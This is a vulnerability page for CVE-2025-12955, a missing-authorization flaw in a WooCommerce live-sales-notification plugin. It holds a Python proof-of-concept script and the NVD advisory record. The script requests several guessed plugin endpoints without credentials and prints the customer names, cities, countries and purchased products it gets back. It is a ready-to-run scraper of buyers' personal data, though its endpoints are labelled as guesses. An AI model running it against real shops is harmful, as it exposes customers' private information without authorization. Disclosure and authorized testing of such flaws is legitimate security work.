CVE-2025-12955

import requests import json # CVE-2025-12955 PoC - Unauthenticated Access to Order Information # Target: WordPress site with Live Sales Notifications for WooCommerce plugin <= 2.3.39 target_url = "http://target-wordpress-site.com" # Method 1: Direct API endpoint access (if endpoint is known) api_endpoints = [ "/wp-json/lsnf/v1/orders", "/wp-admin/admin-ajax.php?action=getOrders", "/wp-admin/admin-ajax.php?action=lsnf_get_orders" ] print("[*] CVE-2025-12955 PoC - Testing for Missing Authorization in getOrders function") print("[*] Target:", target_url) for endpoint in api_endpoints: url = target_url + endpoint print(f"\n[+] Testing endpoint: {endpoint}") try: # No authentication required - this is the vulnerability response = requests.get(url, timeout=10) if response.status_code == 200: try: data = response.json() if isinstance(data, list) or (isinstance(data, dict) and 'orders' in data): print(f"[!] VULNERABLE! Received order data without authentication") print(f"[!] Sample data preview:") print(json.dumps(data[:3] if isinstance(data, list) else data, indent=2)) # Extract customer information orders = data if isinstance(data, list) else data.get('orders', []) for order in orders: customer_info = { 'name': order.get('first_name', 'N/A'), 'city': order.get('city', 'N/A'), 'state': order.get('state', 'N/A'), 'country': order.get('country', 'N/A'), 'product': order.get('product_name', 'N/A'), 'time': order.get('order_time', 'N/A') } print(f"[+] Customer: {customer_info['name']} from {customer_info['city']}, {customer_info['country']}") except json.JSONDecodeError: print(f"[*] Non-JSON response (status {response.status_code})") else: print(f"[*] Status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") print("\n[*] PoC completed") print("[*] Note: This PoC is for authorized security testing only")

{"cve": {"id": "CVE-2025-12955", "sourceIdentifier": "[email protected]", "published": "2025-11-18T10:15:48.710", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Live sales notification for WooCommerce plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 2.3.39. This is due to the \"getOrders\" function lacking proper authorization and capability checks when the plugin is configured to display recent order information. This makes it possible for unauthenticated attackers to extract sensitive customer information including buyer first names, city, state, country, purchase time and date, and product details."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3394241%40live-sales-notifications-for-woocommerce&old=3389540%40live-sales-notifications-for-woocommerce&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/1cebcf16-ae7f-45c4-8e1d-80ede4c32106?source=cve", "source": "[email protected]"}]}}